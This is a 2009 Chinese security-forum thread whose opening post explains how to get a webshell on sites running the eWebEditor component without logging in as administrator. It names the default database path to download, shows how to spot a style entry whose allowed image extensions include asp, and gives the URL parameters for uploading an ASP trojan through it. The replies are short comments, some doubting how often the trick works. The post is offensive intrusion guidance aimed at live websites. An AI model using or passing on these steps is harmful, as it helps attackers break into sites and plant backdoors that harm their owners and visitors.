【3.A.S.T】网络安全爱好者 » 技术交流 » ewebeditor不登陆也获得webshel

返回列表发帖

3.A.S.T中校

Rank: 6 Rank: 6

帖子: 131
积分: 1083
威望: 358
金钱: 2450
在线时间: 414 小时

1楼 跳转到 » 倒序看帖

字体大小: tT

发表于 2009-7-12 15:38 | 只看该作者

[分享] ewebeditor不登陆也获得webshel

ewebeditor, webshel, 登陆

ewebeditor入侵的时候一般是进了后台增加ASP，接着上传ASP木马就获得webshell了。

但有时候无法进后台，情况是这样，下载了数据库但是管理员md5无法破解，无法进入后台，可以利用数据库信息查找别人增加过的 asp

然后我们利用即可获得webshell

默认数据库：db/ewebeditor.mdb 下载数据库到本地

ewebeditor_style
S_ImageExt 图片，可以发现有一个存在asp
gif|jpg|jpeg|bmp|asp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp
gif|jpg|jpeg|bmp

ewebeditor.asp?id=s_id&style=s_name
有asp的s_id是14
s_name看看是什么，是standard

ewebeditor.asp?id=14&style=standard 修改下

上传试下

成功获得webshell

流淚╮鮭鮭

Rank: 8 Rank: 8

帖子: 770
积分: 1366
威望: 1586
金钱: 821
在线时间: 94 小时

管理组高手勋章核心成员内部成员帅哥勋章管理组成员技术组成员

2楼

发表于 2009-7-12 16:20 | 只看该作者

本帖最后由流淚╮鮭鮭于 2009-7-16 02:21 编辑

每个eweb上面都会允许传ASa？
那也太神奇了。

[3.A.S.T]内部成员

Rank: 9 Rank: 9 Rank: 9

帖子: 199
积分: 724
威望: 508
金钱: 10463
在线时间: 185 小时

VIP会员原创奖章贡献奖支持奖章刻苦努力奖优质人品奖章管理组成员

3楼

发表于 2009-7-12 17:26 | 只看该作者

老大。。。说来说去还是要构造。。。别人要留给你机会才可以呀``

[3.A.S.T]内部成员

Rank: 9 Rank: 9 Rank: 9

帖子: 561
积分: 1365
威望: 1488
金钱: 16351
在线时间: 150 小时

4楼

发表于 2009-7-12 20:40 | 只看该作者

哈哈果然如此啊！！！！

3.A.S.T士兵

Rank: 1

帖子: 17
积分: 30
威望: 31
金钱: 41
在线时间: 3 小时

5楼

发表于 2009-8-8 13:11 | 只看该作者

晕，瞎猫碰到死老鼠